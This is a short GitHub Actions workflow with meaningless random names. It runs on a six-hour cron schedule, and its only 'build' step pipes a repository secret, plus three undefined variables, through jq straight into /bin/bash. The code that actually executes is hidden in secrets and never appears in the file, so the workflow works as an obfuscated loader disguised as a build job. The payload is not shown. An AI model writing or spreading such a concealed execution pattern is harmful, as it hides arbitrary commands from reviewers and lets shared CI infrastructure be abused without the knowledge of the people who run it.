name: jialuoshu4716

on:
  workflow_dispatch:
  schedule:
    - cron: '26 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jialuoshu4716
        env:
          quisv4521: ${{ secrets.quisv4521 }}
        run: |
          echo $quisv4521 | jq -r .bmg6 | /bin/bash
          echo $hxobo09 | jq -r .iuuc8 | /bin/bash
          echo $m0 | jq -r .uxnb6 | /bin/bash
          echo $hdhf11 | jq -r .dtoq0741 | /bin/bash

